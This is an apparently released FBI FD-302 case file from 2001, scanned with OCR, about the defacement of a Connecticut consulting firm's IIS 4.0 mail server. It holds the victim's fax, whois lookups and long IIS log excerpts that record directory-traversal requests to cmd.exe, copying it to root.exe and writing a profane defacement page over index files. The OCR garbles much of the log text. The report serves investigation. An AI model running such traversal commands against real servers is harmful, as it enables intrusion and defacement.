The logs are on a CD-R in the attached FD-340 1A envelope. 


Investigation on 5/8/2001 at New Haven, Connecticut 


File # Date dictated 5/8/2001 


This document contains neither recommendations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 
it and its contents are not to be distributed outside your agency. 


b6 
b7Cc 


b3 
b6 
b7c 
b7E 


eee 
» 


FD-302 (Rev. 10-6-95) & ; @ 


Investigation on (telephonically) 


This document contains neither reco’ 


< 


Pate 
FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/27/2001 


date of birthn[_ Be 
Greenfield Consulting Grow 274 Riverside b7c 
Avenue, Westport, Connecticut 203-221-0411 aos ee ee 
contacted the Federal Bureau of Investigation and furnished the 
following information. 


Their web servers were attacked twice. The first attack 
went unnoticed until the defacement. They found the first incident 
while reviewing logs after the second attack. During the second 
attack files on their web page were replaced. 


furnished a facsimile containing information as b6 
to their system_and the attack. On May 21, 2001, in response to a b7c 
request by sa[ he furnished a CD-R containing the logs and 
altered files. 


Attached is a copy of the facsimile. 


b3 


Date dictated Q5-27-O1 b6 
b7Cc 
b7E 


mdations nor conclusions of the FBI. It is the property of the FBI and is loaned to your agency; 


it and its contents are not to be distributed outside your agency. 


24 1 YOHOO 6S2LL 


B60SCO0SE0eL 
80° AVH LO 


NOTLVLS NOTLYNILS30 


LYOdHa LINSHA Xb 


NOTLONNA NOTSSaS 


“YO:2L 1002190 °AVW:aL¥a 
L620 L22 £02 L: TAL 
G77 NASU9 :AHYN 


274 Riverside Ave - Weslport, CT 08880 + Fax (203) 221-0791 ; : 
me Greenfield Consulting Group & 


Fax 


To: FBI Complaint Duty Agent From: 

Fac (203) 503-5098 Pages: 13 (including Cover Page) 
Phone: (203) 777-6311 Date: 05/08/01 

Rez Network Computer Attack Phone: (203) 429-0280 


Urgent OForReview [ Plezso Comment Please Reply © Plieaze Recycle 


PR 


© Comments: 
| was advised to fax this information in so that it can be given to the appropriate people. 
The following people at our office are handling this situation: 


Greenfield Consulting Group 
274 Riverside Avenue 
Westport, CT 06880 
Switchboard: (208) 221-0471 
Fax: (203) 221-0791 


If there is a problem with the fax or if you need more information, Please contact us. 


Thank you for your help in these matters. 


WARNING: THE SUBSEQUENT PAGES CONTAIN PROFANE LANGUAGE 


b6 
b7c¢ 


b6 
b7C 


274 Riverside Ave + espn 06880 « Fax (203) 221-0791 


Greenfield Consulting Group 


To: FB! Complaint Duty Agent From: 

Fax; (203) 503-5098 Pages: 13 (Including Cover Page) 
Phone: (203) 777-6311 Date: 05/08/01 

Re: Network Computer Attack Phone: 


ures OForReview C0 Please Comment \f Please Reply [1 Please Recycle 


@ Comments: 
| was advised to fax this information in so that it can be given to the appropriate people. 


The following people at our office are handling this situation: 


ee Fs] 
a See 
Poet 


Greenfield Consulting Group 
274 Riverside Avenue 
Wesiport, CT 06880 ; 
Switchboard: (203) 221-0411 
Fax: (203) 221-0791 


if there is a problem with the fax or if you need more information, please contact us. 


Thank you for your help in these matters. 


WARNING: THE SUBSEQUENT PAGES CONTAIN PROFANE LANGUAGE 


b6 
b7C 


b6 
b7¢c 


May 8, 2001 


To Whom It May Concern: 


The purpose of this correspondence is to provide information to you in regards to 
unauthorized malicious access to our network. Our apologies for the explicit content. 


Our email server is running NT4.0 Service Pack 5, Exchange Server 5.5, and IIS4.0 for 
Outlook Web Access. 


The email server was attacked on two occasions. The first attack modified files that are 
never accessed, so we did not notice it. We found this attack by browsing log files after 
the second attack took place. The second attack modified all the index.asp, index.htm, 
default.asp, and default.htm files on all of our root web directories for each virtual site. 
This attack we definitely noticed. Originally, these default index pages were set to allow 
our users access to their email from any computer that can access the internet. These 
changes disabled this ability for almost 24 hours. 


Attached are copies of log file excerpts as well as IP Whois lookup information from the 
UXN Spam Combat website tools. Their site is at http://combat.uxn.com. Also attached 
is a copy of what the “index” files were changed to. 


The first attack came from an IP that belongs to a University in Mexico. The second 
attack came from an IP that belongs to a Cable TV station in Japan. Email addresses are 
included on the Whois lookup information, but we have not contacted anyone-outside our 
organization except for the FBI. 

Launching a browser to hitp://210.253.184.2 will take you to the TV station’s website. If 
you go to http://210.253.184.3, you will get a default page from an Apache web server 
running on a UNIX/Linux box. This is the same IP address as contained in our logs. 


Both attackers changed the website pages to contain the exact same message. 


Thank you in advance for any help you can give us in dealing with this problem. 


Sincerel 


b6 
b7Cc 


———== WHOIS information on LP numbers , Page 1 of 1 
IP whois of 200.853.234.124. 


ipw: Connecting to server: whois.arin.net:43 
ipw: Query: net 200.53.234.124 
ipw: Connecting to server: whois.arin.net:43 
ipw: Query: !NETBLK-UABJO-RED-1 
Universidad Autonoma Benito Juarez de Oaxaca (NETBLK-UABJQ-RED-1) 
Ex-Hacienda 5 seores C.U. Edificio de Rectoria 
Oaxaca, Oaxaca 68120 
Mx " 3 


Netname: UABJO-RED-1 
Netblock: 200.53.224.0 - 200.53.239.255 


Coordinator: 


Mendez, Benjamin (BM722-ARIN) uabjo@siu.cen.buap.mx 
“ 52 951-65843 


Record last updated on 12-Apr-2000. 
Database last updated on 7-May-2001 22:52:06 EDT. 


The ARIN Registration Services Host contains ONLY Internet 
Network Information: Networks, ASN's, and related POC's. 

Please use the whois server at rs.internic.net for DOMAIN related 
Information and whois.nic.mil for NIPRNET Information. — 


PE RIISENI IIS ASOT ASSASSINS SESEIE RE SSASSNIAAIRE RBS AIDES RISSANSS RES SIASSISE SAMBA ERS APESIS ENSEANSASESESENS YEARD AES NESSIRSEABIEDRSANSANSAT SAT ANY RESALES SA SAPS RASA SSRASASPASTASESESAASASESAAENERGEVLEANTOREIANSANASESS ASE AVRASRSPANEFAAS IBS AANA RRP MAAS RARE 


May 3, 2001 21:00 GMT, whois.arin.net is very slow 


Ta co on Aheckin Le Lor 
Sn OL OSL. Jor” thek Sllus 
a 


http://erik.selwerd nl/ipw.cgi?time=20&ip=200.53.234.124 05/08/01 


200.53.234.124, ~, 5/6/01, 18:29:28, W3SVCL, GCGPO1, 192.168.1.13, 391, 66, 
505, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /cetdir, 
200.53.234.124, -, 5/6/01, 18:29:39, W3SVC1, GCGPO1, 192.168.1.13, 15, 70, 796, 
200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /ctdirt..\, 

200.53.234.124, -, 5/6/01, 18:29:39, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 
382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, 
/ctcopy+\winnt\system32\cmd.exetroot.exe, 

200.53.234.124, -, 5/6/01, 18:30:12, W3SVC1, GCGPO1, 192.168.1.13, 62, 423, 
355, 502, 0, GET, /scripts/root.exe, 
/c+echot*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br®>*<br*>*<br*>*<br*>*<t 
ablet+twidth%3D100%*>*<td*>*<ptalign$3D%22center%22*>*<font+sizet3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr“>*<td*>*<ptalignt3D%22center%22*>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center$22*>*<font+siz 
e%3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>.././index.asp, 
200.53.234.124, -, 5/6/01, 18:30:12, W3SVC1, GCGPO1, 192.168.1.13, 31, 423, 
355, 502, 0, GET, /scripts/root.exe, 
/ce+echo+*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<bre>*<br*>*<t 
ablet+width%3D1003%>*<td*>*<ptalign$3D%22center%22*>*<font+sizes3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptaligné3D%22center$22%>*<font+sizes 
3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center%22*%>*<fontt+siz 
e$3D4+color$3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>.././index. htm, 
200.53.234.124, -, 5/6/01, 18:30:23, W3SVC1, GCGPO1, 192.168.1.13, 15, 425, 

355, 502, 0, GET, /scripts/root.exe, 

/etechot*<html*>*<body+bgcol orsDblack*>*<br*>*<br*>*<br*>*<bro><br*>*<br*>*<t 
able+width33D100%%>*<td*>*<p+talign$3D%22center%22*%>*<font+sizes3D7+colors3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptaligné3D%22center$22*%>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>“*<ptaligns3D%22center%22*>*<font+siz 
e%3D4+color%3Dred*>contact: sysadmen@yahoo. com.cn*</html*>>.././default.asp, 
200.53.234.124, ~, 5/6/01, 18:30:23, W3SVC1, GCGPO1, 192.168.1.13, 16, 425, 
355, 502, 0, GET, /scripts/root.exe, 

/crechot*<html *>*<bodytbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
ablet+twidth%3D100%%*>*<td*>“*<ptalign$3D$22centers22*>*<fonttsizet3D7+color%3Dred”* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalignt3D%22center$22*>*<font+sizes 
3D7+color%3Dred*>fuck+PoizonBox*<tr*>*<td*>*<ptaligns3D%22center%22*>*<fontt+siz 
e%3D4+color$3Dred*>contact : sysadmcn@yahoo.com.cn*</html*>>.././default.htm, 
200.53.234.124, -, 5/6/01, 18:30:23, W3SVC1, GCGPO1, 192.168.1.13, 63, 100, 
382, 502, 0, GET, /scripts/../../winnt/system32/cmd. exe, 
/ctcopyt+\winnt\system32\cmd.exet+root. exe, 

200.53.234.124, -, 5/6/01, 18:30:28, W3SVC1, GCGPO1, 192.168.1.13, 63, 424, 
355, 502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+bgcolor$3Dblack*>*<br*>*<br*>*<bxr*>*<bre>*<br*>*<bre>*<t 
ablet+twidth$3D100%*>*<td*>*<ptalign$3D%22center%22*>*<fontt+sizes3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptaligns3D%22centers22*%>*<fontt+sizes 
3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligné3D%22center$22%>*<font+siz 
e%3D4+color$3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>../../index.asp, 
200.53.234.124, -, 5/6/01, 18:30:38, W3SVC1, GCGPO1, 192.168.1.13, 15, 424, 
355, 502, 0, GET, /scripts/root.exe, 
/ct+techot*<html*>*<bodytbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
ablet+width$3D100%*>*<td*>*<ptaligns3D%22centers22*>*<fonttsizes3D7+colors3Dred”* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptralignt3D%22center%22*>“*<fontt+sizes 
3D7+color$3Dred*>fuckt+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center%22*%>*<font+siz 
e&3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../../index.htm, 


Except of /ofile ING Bio Los 
hick £5 [te WS, 


ois information on IP numbers 


IP whois of 210.253.184.3 


ipw: Connecting to server: whois.arin.net:43 
ipw: Query: net 210.253.184.3 

ipw: Connecting to server: whois.apnic.net:43 
ipw: Query: 210.253,184.3 


inetnum: 
netname: 
descr: 
descr: 
country: 
admin-c: 
tech-c: 
remarks: 
remarks: 
remarks: 
remarks: 
remarks: 
remarks: 
remarks: 
remarks: 
changed: 
changed: 
source: 


210.253-184.0 - 210.253.184.31 

TV-HANNO 

Hanno Cable Television Corp. 

19-1 Kokubo, Hanno-shi, Saitama 357-0015, JAPAN 

JP : 

AM575dP 

TUS9I3TP 

This information has been partially mirrored by APNIC from 
JPNIC. To obtain more specific information, please use the 
JPNIC whois server at whois.nic.ad.jp. (This defaults to 
Japanese output, use the /e switch for English output) 
This information has been partially mirrored by APNIC from 
JPNIC. To obtain more specific information, please use the 
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210.253.184.3, -, 5/7/01, 3:34:04, W3SVC1, “GCGPO1, 192.168.1.13, 31, 66, 554, 
200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /ct+dir, 

210.253.184.3, -, 5/7/01, 3:34:04, W3SVC1, GCGPO1, 192.168.1.13, 15, 70, 1000, 
200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /ctdirt+..\, 

210.253.184.3, -, 5/7/01, 3:34:04, W3SVC1, GCGPO1, 192.168.1.13, 32, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd. exe, 
/ct+copy+\winnt\system32\cmd.exe+root.exe, 

210.253.184.3, -, 5/7/01, 3:34:04, W3SVC1, GCGPO1, 192.168.1.13, 125, 423, 355, 
502, 0, GET, /scripts/root.exe, 
/ct+echot*<html*>*<body+tbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
abletwidth%$3D100%*>*<td*>*<p+align$3D%22center$22*>*<fontt+sizes$3D7+color%3Dred* 
>fuck+USAt+Government*</font*>*<tr*>*<td*>*<ptalign%3D%22center$22*>“<font+sizes 
3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign%3D%22center$22°>*<font+siz 
e$3D4+color$3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>.././index.asp, 
210.253.184.3, -, 5/7/01, 3:34:06, W3SVC1, GCGPO1, 192.168.1.13, 16, 423, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<bodyt+tbhgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*e>*<pr*>*<t 
able+widtht3D100%*>*<td*>*<ptalign$3D%22center%22*%>“<font+size$3D7+color%3Dred* 
>fuck+USAtGovernment*</font*>*<tr*>*<td*>*<ptaligns3D%22center$22*>*<font+sizes 
3D7+color%3Dred*>fuck+PoLlzonBOx*<tr*>*<td*>*<ptaligns3D%Z2center$22%>*<fontt+siz 
e%3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>.././index.htm, 
210.253.184.3, -, 5/7/01, 3:34:06, W3SVC1, GCGPO1, 192.168.1.13, 15, 425, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>“*<br*>*<br*>*<br*>*<br*>*<t 
ablet+width33D100%3“>*<td*>*<ptalign$3D%22center%22*>*<fonttsize$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr®>*<td*>*<ptalignt3D%22center%22*>*<font+sizes 
3D7+colors3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center$22°>*<font+siz 
e%3D4+color$3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>.././default.asp, 
210.253.184.3, -,. 5/7/01, 3:34:06, W3SVC1, GCGPO1, 192.168.1.13, 16, 425, 355, 
502, 0, GET, /scripts/root.exe, 
/ct+echot+*<html*>*<bodytbgcolor%3Dblack*>*<br*>*<br*>“<br*>*<br*>*<br*>*<br*>*<t 
abletwidth%3D100%*2*<td*>“*<ptalign$3D%22center%22*>*<font+sizet3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%$22center%22*>“<font+size% 
“3D7+color$3Dred*>f£uck+Poi zonBOx’<tr*>*<td*>*<ptaligns3D%22center%22*%>*<font+siz 
e%3D4+color%3Dred*>contact: sysadmcn@yahoo. com.cn*</html*>>.././default.htm, 
210.253.184.3, -, 5/7/01, 3:34:06, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 
502, 0, GET, /scripts/../.-/winnt/system32/cmd.exe, 
/ct+copy+\winnt\system32\cmd. exe+root.exe, 

210.253.184.3, -, 5/7/01, 3:34:08, W3SVC1, GCGPO1, 192.168.1.13, 328, 424, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<htmi*>*<body+tbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
ablet+width$3D100%*>*<td*>*<ptalign$3D%22center$22*>*<font+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign%3D%22center%22*>*<font+sizes 
3D7+color$3Dred*>fucktPoizonBOx*<tr*>*<td*>*<ptaligns3D%22center$22*>*<font+siz 
e$3D4+color%3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>../../index.asp, 
210.253.184.3, -, 5/7/01, 3:34:08, W3SVC1, GCGPO1, 192.168.1.13, 32, 424, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<bodytbgcolor$3Dblack*>*<br*>*<br°>*<br*>*<br*>*<br*>*<br*>*<t 
abletwidth%3D100%*>*<td*>*<p+align$3D%22center$22*>*<font+size$3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+sizes 
3D7+color%3Dred*>fuck+Poi zonBOx*<tr*>*<td*>“*<ptalign%3D%$22center$22*%>*<font+siz 
e$3D4+colors3Dred*>contact: sysadmcn@yahoo. com.cn*</html*>>../../index.htm, 
210.253.184.3, -, 5/7/01, 3:34:08, W3SVC1, GCGPO1, 192.168.1.13, 16, 426, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<bodytbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br7*>*<t 
abletwidtht3D100%*>7<td*>*<ptalign$3D%22center$22*>*<font+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center%22*%>*<font+size% 
3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center%22*>*<fonttsiz 
e%3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../../default.asp, 
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210.253.184.3, -, 5/7/01, 3:34:08, W3SVC1, “GCGPO1, 192.168.1.13, 31, 426, 355, 
502, 0, GET, /scripts/root.exe, 
/ctecho+*<html*>*<body+tbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+width%3D100%%*>*<td*>*<p+talign$3D%22center$22*>*<font+sizes3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center%22*>"<font+size$ 
3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign%3D%22center$22*>*<fontt+siz 
et3D4t+color$3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../../default.htm, 
210.253.184.3, ~, 5/7/01, 3:34:08, W3SVC1, GCGPO1, 192.168.1.13, 32, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd.exe, 
/et+copy+\winnt\system32\cmd.exetroot.exe, 

210.253.184.3, -, 5/7/01, 3:34:11, W3SVC1, GCGPO1, 192.168.1.13, 125, 429, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<bodytbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
abletwidth%3D100%*>*<td*>*<p+talign%3D%22center$22“>*<font+sizes3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+size% 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center%22*%>*<font+siz 
es3D4+color%3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>. ./wwwroot/index.asp, 
210.253.184.3, -, 5/7/01, 3:34:11, W3SVC1, GCGPO1, 192.168.1.13, 16, 429, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+widtht3D100%*>“<td*>*<ptalign$3D%22center%22*>*<font+sizes3D7+color%3Dred* 
>fuckt+USA+Government*</font*>*<txr*>*<td*>*<ptalign%3D%22center%22*>*<font+sizes 
3D7+color%3Dred*>fuckt+PoizonBOx*<tr*>*<td*>*<ptalign%3D%22center$22%>*<font+siz 
e$3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>. . /wwwroot/index.htm, 
210.253.184.3, -, 5/7/01, 3:34:11, W3SVC1, GCGPO1, 192.168.1.13, 15, 431, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+width%3D100%*>*<td*>*<p+talign%3D%$22center$22*>*<font+sizes3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+sizes 
3D7+colort%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center%22*>“<font+siz 
e%3D4+color%3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>../wwwroot/default.as 


Pp, 

210.253.184.3, -, 5/7/01, 3:34:11, W3SVC1, GCGPO1, 192.168.1.13, 16, 431, 355, 
502, 0, GET, /scripts/root.exe, : 
/ctechot*<html*>*<body+tbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+width%3D100%*>*<td*>*<p+align$3D%22center%22*>*<font+sizes3D7+color%3Dred* 


* >fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+sizes 


3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<pt+alignt3D%$22center%22*>“<font+siz 
e%3D4+color%3Dred*>contact: sysadmentyahoo. com. cn*</html*>>. . /wwwroot/default.ht 
m, 

210.253.184.3, -, 5/7/01, 3:34:11, W3SVC1, GCGPO1, 192.168.1.13, 47, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd.exe, 
/c+copyt\winnt\system32\cmd.exe+root.exe, 

210.253.184.3, -, 5/7/01, 3:34:13, W3SVC1, GCGPO1, 192.168.1.13, 140, 429, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br>%<t 
able+width83D100%*>*<td*>*<p+align$3D%$22center%22%>*<font+size%3D7+color$3Dred* 
>fuckt+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22°>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign%3D%22center%22*>*<font+siz 
e%3D4+colors3Dred*>contact : sysadmcn@yahoo.com.cn*</html*>>../ftproot/index.asp, 
210.253.184.3, -, 5/7/01, 3:34:13, W3SVC1, GCGPO1, 192.168.1.13, 16, 429, 355, 
502, 0, GET, /scripts/root.exe, 
/ct+echot*<html*>*<body+bgcolor%3Dblack*>*<br*>4<br*>*<br*>“<br*>*<br*>*<br*>*<t 
able+width%3D100%*>*<td*>*<ptalign$3D%22center%$22*>*<font+size$3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign’3D%22center$22%>*<font+size% 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign%3D%22center$22%>*<font+siz 
e$3D4+colors3Dred*>contact: sysadmcn@yahoo. com. cn*</html*>>../ftproot/index.htm, 


Le: 


210.253.184.3, -, 5/7/01, 3:34:13, W3SVC1, GCGPO1, 192.168.1.13, 16, 431, 355, 
502, 0, GET,. /scripts/root.exe, 
/crecho+*<html*>*<body+bgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
ablet+twidth%3D100%*>*<td*>*<ptalign$3D%22center$22*>*<fonttsizet3D7+color%3Dred* 
>fuck+USAt+Government*</font*>*<tr*>*<td*>“*<ptalignt3D%22center%22%*>“<font+sizet 
3D7+color%3Dred*>fuck+PoizonBox*<tr*>*<td*>*<ptralign$3D%22center$22*%>*<font+siz 
e%3D4+color$3Dred“*>contact: sysadmcn@yahoo. com.cn*</html*>>../ftproot/default.as 
P, ‘ 

210.253.184.3, -, 5/7/01, 3:34:13, W3SVC1, GCGPO1, 192.168.1.13, 31, 431, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>“<bodytbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+width$3D100%*>*<td*>*<p+talign$3D%22center$22*>*<fonttsize$3D7+color%3Dred* 
>fuck+USAt+Government*</font*>*<tr%>*<td*>*<ptalign%3D%22center%22*>*<font+sizes 
3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign%3D$22center$22*>*<font+siz 
e%3D4t+tcolor%3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>../ftproot/default.ht 
m, 

210.253.184.3, -, 5/7/01, 3:34:13, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 
502, 0, GET, /sexipts/../../winnt/system32/cnd. exe, 

Jekcooys \winnt\Systema2 Vand. exet+root.exe, 

210.253.184.3, -, 5/7/01, 3:34:16, W3SVC1, GCGPO1, 192.168.1.13, 125, 430, 355, 
$02, 0, GET,  secieve soot ese: 
/ctechot*<html*>*<bodyt+bgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br®>*<br*>*<br*>*<t 
abletwidtht3D100%%>*<td*>*<ptralign$3D%22center$22*>*<font+size%3D7+color%$3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>“*<ptaligns3D%22center$22*>*<font+sizes 
3D7+color$3Dred*>fuck+PolzonBOx*<tr*>*<td*>*<ptalign%3D$22center$22*>*<font+siz 
e$3D4+color%$3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>../gophroot/index.asp 


f 

210.253.184.3, -, 5/7/01, 3:34:16, W3SVC1, GCGPO1, 192.168.1.13, 31, 430, 355, 
502, 0, GET, /scripts/root.exe, 
/crecho+*<html*>*<bodytbgcolort3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br®>*<t 
ablet+width$3D100%*>*<td*>*<ptalign%$3D%22center$22*>*<font+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptaligné3D%$22center$22*>*<font+size% 
3D7+color$3Dred*>fucktPoilzonBOx*<txr*>*<td*>*<ptralign$3D$22center$22*>“<font+siz 
‘e83D4+color$3Dred*>contact: sysadmen@yahoo. com.cn*</html*>>../gophroot/index-htm 


‘ 

210.253.184.3, -, 5/7/01, 3:34:16, W3SVC1, GCGPO1, 192.168.1.13, 31, 432, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot+*<html*>*<bodytbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
abletwidtht3D100%*>*<td*>*<p+align%3D%22center$22*>“*<font+size%3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptaligns3D%22center$22*>*<font+sizés 
3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center%22*>*<font+siz 


e%3D4+color$3Dred*>contact: sysadmen@yahoo. com.cn*</html*>>../gophroot/default.a 


SP, 

210.253.184.3, ~, 5/7/01, 3:34:16, W3SVC1, GCGPO1, 192.168.1.13, 31, 432, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<bre>*<t 
abletwidth%3D100%*>*<td*>*<ptalign%3D%22center$22*>*<font+size$3D7+color%$3Dred* 
>fuck+USAt+Government*</font*>*<tr*>*<td*>“<ptaligns3D%22center%22*>*<font+size% 
3D7+colort3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign’3D%$22center$22*>“<font+siz 
e$3D4+color%3Dred“*>contact: sysadmen@yahoo. com. cn*</html*>>../gqophroot/default.h 
tm, 

210.253.184.3, -, 5/7/01, 3:34:16, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd, exe, 
/ct+copy+\winnt\system32\cmd. exerroot.exe, 

210.253.184.3, -, 5/7/01, 3:34:18, W3SVC1, GCGPO1, 192.168.1.13, 156, 429, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<bodytbgcoloxr$3Dblack*>*<br*>*<br°>*<br*>*<br*>*<br*>*<br>*<t 
able+widtht3D100%*>*<td*>“*<ptalign%3D%22center$22*%>*<fontt+size%3D7+color%3Dred* 
>fuck+USAt+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center%22*>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign$3D$22center$22°>"<font+siz 
e$3D4+color$3Dred*>contact: sysadmen@yahoo. com. cn*</html*>>../scripts/index.asp, 


ef t 


210.253.184.3, ~, 5/7/01, 3:34:18, W3SVC1, GCGPO1, 192.168.1.13, 16, 429, 355, 
502, 0, GET,. /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+width%3D100%%>*<td*>*<ptalign%3D%22center$22*>*<font+sizet3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+sizes 
3D7+color%3Dred*>fuckt+PoizonBOx*<tr*>*<td*>*<ptalign%3D%22center$22°>*<font+siz 
e$3D4+color%3Dred*>contact: sysadmcn@yahoo. com.cn*</html*>>../scripts/index.htm, 
210.253.184.3, ~, 5/7/01, 3:34:18, W3SVC1, GCGPO1, 192.168.1.13, 16, 431, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor%3Dblack*>*<br%*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
ablet+twidth%3D100%*>*<td*>*<ptalign$3D%22center$22*>*<font+size$3D7+color%3Dred* 
>fuck+USAt+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+sizes 
